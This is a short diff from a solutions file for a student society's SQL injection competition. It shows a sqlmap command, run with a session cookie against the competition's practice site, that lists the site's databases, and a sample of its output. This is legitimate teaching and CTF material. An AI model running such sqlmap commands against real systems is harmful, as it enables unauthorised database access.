CyberSoc-Newcastle/sql-injection-competition/competition/solutions.md

 As you had to log in to get to the member's area, you will need to use a cookie.
 The cookie will contain your session that authorises you to access this page.
 You can find your cookie value using the developer tools in your web browser, make sure to copy the whole value to provide to SQLMap.

-To find the name of this database you could use the command `sqlmap.py -u "https://sql.cybersoc.org.uk/members/rent?category=Jet+Ski" --cookie "<COOKIE_VALUE>" -dbs`.
+To find the name of this database you could use the command `sqlmap -u "https://sql.cybersoc.org.uk/members/rent?category=Jet+Ski" --cookie "<COOKIE_VALUE>" -dbs`.
 This would give the output:
 ```
 available databases [3]:
 [*] geordie_boat_rentals_ltd